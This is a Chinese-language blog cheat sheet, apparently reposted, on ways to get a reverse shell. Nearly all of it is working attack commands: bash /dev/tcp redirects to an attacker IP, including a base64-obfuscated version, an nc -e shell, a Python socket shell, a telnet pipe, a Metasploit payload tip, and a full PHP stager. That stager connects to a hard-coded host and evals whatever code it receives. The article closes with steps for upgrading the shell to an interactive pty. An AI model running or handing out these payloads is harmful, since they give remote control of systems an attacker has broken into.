&/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell。_python反弹shell脚本">
当前位置:   article > 正文

各种shell反弹方法_python反弹shell脚本

python反弹shell脚本

1.利用bash进行反弹shell

        先使用nc进行监听 nc -lvvp port端口号

        再在目标机器执行bash -i >& /dev/tcp/攻击ip/端口 0>&1 

        bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjcvMjIzMyAwPiYx}|{base64,-d}|{bash,-i}

2.使用nc进行反弹shell

        nc -e /bin/bash  攻击IP 端口

3.使用python反弹shell

        python -c 'import socket,subprocess,os;s=socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击ip",port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4.利用msf进行反弹

        直接设置payload即可,tcp_reverse等

        若遇到反弹回来的shell有乱码,可以输入chcp 65001解决

5.使用telnet进行反弹

        telnet ip port 0<a | /bin/bash 1>a

6.使用php反弹shell

        需要先上传一个php文件,然后在客户端访问并且加参

        文件内容:

        <?php /**/ error_reporting(0); $ip = '192.168.56.107'; $port = 6666; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

        传参:

        post方式,ip=???&port=???即可

7.得到会话后,利用python升级成完全交互

        python -c 'import pty; pty.spawn("/bin/bash")'

        退出

        stty raw -echo

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/486474
推荐阅读
相关标签
  

闽ICP备14008679号